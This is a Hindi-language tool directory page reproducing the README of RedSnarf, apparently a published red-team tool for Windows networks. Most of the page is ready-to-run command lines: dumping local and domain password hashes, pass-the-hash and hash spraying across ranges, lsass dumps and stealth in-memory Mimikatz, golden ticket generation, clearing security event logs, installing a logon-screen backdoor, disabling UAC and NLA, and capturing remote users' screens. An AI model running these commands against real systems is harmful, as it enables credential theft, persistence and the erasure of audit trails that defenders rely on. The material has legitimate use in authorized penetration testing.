Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
redsnarf — RedSnarf एक pen-testing / red-teaming टूल है जो Windows वातावरण के लिए है। | Kitploit
उपकरण/GitHubGitHub/nccgroup/redsnarf
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिपेलोड जनरेशनशोषणहैश विश्लेषणपार्श्व आंदोलनजानकारी एकत्र करनापोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूल
1.2k23569 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubnccgroup/redsnarf

redsnarf

RedSnarf एक pen-testing / red-teaming टूल है जो Windows वातावरण के लिए है।

रिपॉजिटरी देखेंवेबसाइट

______ .____________ _____
______ \ ____ | / / ____ _____ ____/ \ | // __ \ / __ |_ \ / \ \ __ \ __\
| | \ __// // |/ \ | / __ | | /| |
|
|
/_
>
_ /_______ /_| (__ /| ||
/ / / / / /
[email protected] @redsnarf

GitHub license

RedSnarf एक पेन-टेस्टिंग / रेड-टीमिंग टूल है, जिसे एड विलियम्स द्वारा बनाया गया है। यह OpSec सुरक्षित तकनीकों का उपयोग करके विंडोज वर्कस्टेशन, सर्वर और डोमेन कंट्रोलर से हैश और क्रेडेंशियल प्राप्त करने के लिए है।

वीडियो के लिए हमारा YouTube चैनल देखें https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ

RedSnarf की कार्यक्षमता में शामिल हैं:

• स्थानीय SAM हैश प्राप्त करना
• उन्नत सिस्टम विशेषाधिकारों के साथ चल रहे उपयोगकर्ताओं और उनके संबंधित lsa secrets पासवर्ड की गणना करना;
• MS कैश्ड क्रेडेंशियल प्राप्त करना;
• Pass-the-hash;
• कमजोर और अनुमान लगाने योग्य उपयोगकर्ता नाम/पासवर्ड संयोजनों की त्वरित पहचान (डिफ़ॉल्ट administrator/Password01);
• एक सीमा पर हैश प्राप्त करने की क्षमता;
• Hash spraying -
Credsfile pwdump, fgdump और स्पेस से अलग किए गए सादे टेक्स्ट उपयोगकर्ता नाम और पासवर्ड के मिश्रण को स्वीकार करेगा;
• Mimikatz के साथ ऑफलाइन विश्लेषण के लिए Lsass डंप;
• NTDSUtil का उपयोग करके डोमेन कंट्रोलर हैश डंप करना और स्थानीय पार्सिंग के लिए NTDS.dit प्राप्त करना;
• drsuapi विधि का उपयोग करके डोमेन कंट्रोलर हैश डंप करना;
• डोमेन कंट्रोलर से Scripts और Policies फोल्डर प्राप्त करना और 'password' और 'administrator' के लिए पार्स करना;
• cpassword हैश को डिक्रिप्ट करने की क्षमता;
• रिमोट मशीन पर शेल शुरू करने की क्षमता;
• इवेंट लॉग (application, security, setup या system) को साफ करने की क्षमता; (केवल आंतरिक संस्करण)
• विश्लेषण के लिए परिणाम प्रति-होस्ट आधार पर सहेजे जाते हैं।
• रिमोट मशीन पर RDP सक्षम/अक्षम करें।
• रिमोट मशीन पर RDP पोर्ट 3389 से 443 में बदलें।
• रिमोट मशीन पर NLA सक्षम/अक्षम करें।
• पता लगाएं कि उपयोगकर्ता रिमोट मशीनों पर कहाँ लॉग इन हैं।
• Windows लॉगऑन स्क्रीन में बैकडोर डालें
• रिमोट मशीन पर UAC सक्षम/अक्षम करें।
• स्टील्थ mimikatz जोड़ा गया।
• डोमेन हैश का पार्सिंग
• यह निर्धारित करने की क्षमता कि कौन से खाते सक्षम/अक्षम हैं
• रिमोट लॉग ऑन एक्टिव यूजर के डेस्कटॉप का स्क्रीनशॉट लें
• रिमोट लॉग ऑन एक्टिव यूजर के डेस्कटॉप को रिकॉर्ड करें
• Windows CPassword डिक्रिप्ट करें
• WinSCP पासवर्ड डिक्रिप्ट करें
• उपयोगकर्ता SPN प्राप्त करें
• रिमोट मशीनों से WIFI पासवर्ड प्राप्त करें

RedSnarf उपयोग

आवश्यकताएँ:
Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git
CredDump7 - https://github.com/Neohapsis/creddump7
Lsass प्राप्त करने के लिए procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Netaddr (0.7.12) - pip install netaddr
Termcolor (1.1.0) - pip install termcolor
iconv - स्थानीय रूप से Mimikatz जानकारी पार्स करने में उपयोग किया जाता है

सहायता दिखाएँ
./redsnarf.py -h
./redsnarf.py --help

स्थानीय हैश प्राप्त करें

एकल मशीन से कमजोर स्थानीय क्रेडेंशियल का उपयोग करके और Security इवेंट लॉग को साफ करते हुए स्थानीय हैश प्राप्त करें
./redsnarf.py -H ip=10.0.0.50 -uC security

एकल मशीन से कमजोर स्थानीय क्रेडेंशियल का उपयोग करके और application इवेंट लॉग को साफ करते हुए स्थानीय हैश प्राप्त करें
./redsnarf.py -H ip=10.0.0.50 -uC application

एकल मशीन से स्थानीय व्यवस्थापक क्रेडेंशियल का उपयोग करके स्थानीय हैश प्राप्त करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .

एकल मशीन से डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके स्थानीय हैश प्राप्त करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com

नेटवर्क रेंज पर स्थानीय व्यवस्थापक क्रेडेंशियल का उपयोग करके हैश प्राप्त करें
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .

नेटवर्क रेंज पर डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके हैश प्राप्त करें
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com

नेटवर्क रेंज पर डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके हैश प्राप्त करें
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com

Hash Spraying

नेटवर्क रेंज पर हैश स्प्रे करें
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .

नेटवर्क रेंज पर डोमेन लॉगिन के साथ हैश प्राप्त करें
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com

क्रेडेंशियल की त्वरित जाँच करें
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y

उपयोगकर्ता नामों वाली फाइल (-hS) और एक सामान्य पासवर्ड (-hP) की त्वरित जाँच करें
./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y

डोमेन हैश प्राप्त करें

drsuapi विधि का उपयोग करके हैश प्राप्त करें (सबसे तेज़)
यह विधि एक वैकल्पिक फ्लैग -q y का समर्थन करती है जो LDAP को क्वेरी करेगा और आउटपुट देगा कि खाते सक्रिय हैं या अक्षम
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)

NTDSUtil का उपयोग करके हैश प्राप्त करें
यह विधि एक वैकल्पिक फ्लैग -q y का समर्थन करती है जो LDAP को क्वेरी करेगा और आउटपुट देगा कि खाते सक्रिय हैं या अक्षम
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)

गोल्डन टिकट उत्पन्न करना
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y

सूचना संकलन

डोमेन कंट्रोलर से Policies और Scripts फोल्डर कॉपी करें और password और administrator के लिए पार्स करें
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y

Cpassword डिक्रिप्ट करें
./redsnarf.py -uG cpassword

उपयोगकर्ता ढूँढें - लाइव
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name

उपयोगकर्ता ढूँढें - ऑफलाइन (पहले से डाउनलोड की गई जानकारी खोजता है)
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name

NT AUTHORITY\SYSTEM टास्कलिस्ट प्रदर्शित करें
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y

रिमोट लॉग ऑन एक्टिव यूजर के डेस्कटॉप का स्क्रीनशॉट लें
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y

विविध

स्थानीय व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर शेल शुरू करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर शेल शुरू करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y

Mimikatz के साथ ऑफलाइन पार्सिंग के लिए lsass की एक कॉपी प्राप्त करें - स्थानीय व्यवस्थापक क्रेडेंशियल का उपयोग करके
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y

स्टील्थ mimikatz चलाएं, यह विकल्प एक वेब-सर्वर शुरू करता है जो एक powershell स्क्रिप्ट प्रदान करता है, यह मशीन साइड पर अस्पष्ट और एन्कोडेड होता है, डेटा डिस्क को नहीं छूता - क्रेडेंशियल को आसानी से पढ़ने योग्य शैली में grep किया जाता है और स्क्रीन पर इको किया जाता है।
./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y

कस्टम कमांड चलाएं
उदाहरण 1
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'

उदाहरण 2 - डबल कोट्स को \ से एस्केप करना होगा
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'

स्थानीय एक्सेस टोकन नीति
lat.bat नामक एक बैच फाइल बनाता है जिसे आप रिमोट मशीन पर कॉपी और पेस्ट करके निष्पादित कर सकते हैं, जो रजिस्ट्री को संशोधित करेगा और स्थानीय एक्सेस टोकन नीति सेटिंग्स को सक्षम या अक्षम करेगा।
./redsnarf.py -rL y

Wdigest
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर UseLogonCredential Wdigest रजिस्ट्री मान सक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर UseLogonCredential Wdigest रजिस्ट्री मान अक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर UseLogonCredential Wdigest रजिस्ट्री मान क्वेरी करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q

UAC
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर UAC रजिस्ट्री मान सक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर UAC रजिस्ट्री मान अक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर UAC रजिस्ट्री मान क्वेरी करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q

बैकडोर - बैकडोर Windows स्क्रीन - सक्रिय करने के लिए Left Shift + Left Alt + Print Screen दबाएँ
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर बैकडोर रजिस्ट्री मान सक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर बैकडोर रजिस्ट्री मान अक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर बैकडोर रजिस्ट्री मान क्वेरी करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q

AutoLogon
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर Windows AutoLogon रजिस्ट्री मान सक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर Windows AutoLogon रजिस्ट्री मान अक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर Windows AutoLogon रजिस्ट्री मान क्वेरी करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके रिमोट मशीन उपयोगकर्ता सत्र को लॉक करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y

RDP

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP सक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP अक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP स्थिति क्वेरी करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q

RDP पोर्ट 3389 से 443 में बदलें - डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP पोर्ट 443 में बदलें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP पोर्ट डिफ़ॉल्ट 3389 पर बदलें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP पोर्ट मान क्वेरी करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q

Mimikatz के साथ मल्टी-RDP सक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP SingleSessionPerUser सक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP SingleSessionPerUser अक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP SingleSessionPerUser स्थिति क्वेरी करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q

NLA

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर NLA सक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर NLA अक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर NLA स्थिति क्वेरी करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q

टूल डाउनलोड करें